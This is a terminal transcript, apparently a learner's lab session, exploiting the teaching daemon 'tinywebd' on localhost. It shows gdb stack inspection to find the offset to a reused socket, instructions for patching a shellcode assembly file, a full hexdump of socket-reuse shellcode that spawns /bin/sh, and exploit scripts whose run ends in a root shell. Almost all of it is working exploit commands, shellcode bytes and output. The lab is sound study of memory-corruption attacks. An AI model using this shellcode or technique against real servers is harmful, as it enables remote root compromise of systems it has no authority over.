root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root      2282  0.0  0.0   2180   368 ?        Ss   22:13   0:00 ./tinywebd
root      2837  0.0  0.0   5924   840 pts/1    S+   22:37   0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q -pid=2282 --symbols=./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
Attaching to process 2282
Load new symbol table from "/home/tomovic/Dokumente/hack/tinywebd"? (y or n) n
Nicht bestätigt.
(gdb) list handle_connection
77 /* This function handles the connection on the passed socket from the
78  * passed client address and logs to the passed FD. The connection is
79  * processed as a web request and this function replies over the connected
80  * socket.  Finally, the passed socket is closed at the end of the function.
81  */
82 void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
83    unsigned char *ptr, request[500], resource[500], log_buffer[500];
84    int fd, length;
85 
86    length = recv_line(sockfd, request);
(gdb) break 86
Haltepunkt 1 at 0x8048f80: file tinywebd.c, line 86.
(gdb) cont
Continuing.

Breakpoint 1, handle_connection (sockfd=10, client_addr_ptr=0xbffff6f8, logfd=3) at tinywebd.c:86
86    length = recv_line(sockfd, request);
(gdb) x/x &sockfd
0xbffff6d0: 0x0000000a
(gdb) x/x &new_sockfd
No symbol "new_sockfd" in current context.
(gdb) bt
#0  handle_connection (sockfd=10, client_addr_ptr=0xbffff6f8, logfd=3) at tinywebd.c:86
#1  0x08048f73 in main () at tinywebd.c:72
(gdb) select-frame 1
(gdb) x/x &new_sockfd
0xbffff71c: 0x0000000a
(gdb) quit
A debugging session is active.

 Inferior 1 [process 2282] will be detached.
 
Quit anyway? (y or n) y
Detaching from program: /home/tomovic/Dokumente/hack/tinywebd, process 2282


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0xbffff71c - 0xbffff6d0
$1 = 0x4c
(gdb) quit

Bitte ändert die Werte in der .s-Datei wie folgt:
   push 0x08048fb7      ; return address

   lea edx, [esp+0x4c]  ; put the address of new_sockfd in edx

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm socket_reuse_restore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C socket_reuse_restore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X....t..l$hh..|
00000010  04 08 c3 8d 54 24 5c 8b  1a 6a 02 59 31 c0 31 d2  |....T$\..j.Y1.1.|
00000020  b0 3f cd 80 49 79 f9 b0  0b 52 68 2f 2f 73 68 68  |.?..Iy...Rh//shh|
00000030  2f 62 69 6e 89 e3 52 89  e2 53 89 e1 cd 80        |/bin..R..S....|
0000003e
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chmod a+x ./xt_reuse.sh
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh socket_reuse_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: socket_reuse_restore (62 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 307] [shellcode 62] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root
---------------- Terminal 2

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_slient.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root      3023  0.0  0.0   5924   840 pts/2    S+   22:53   0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
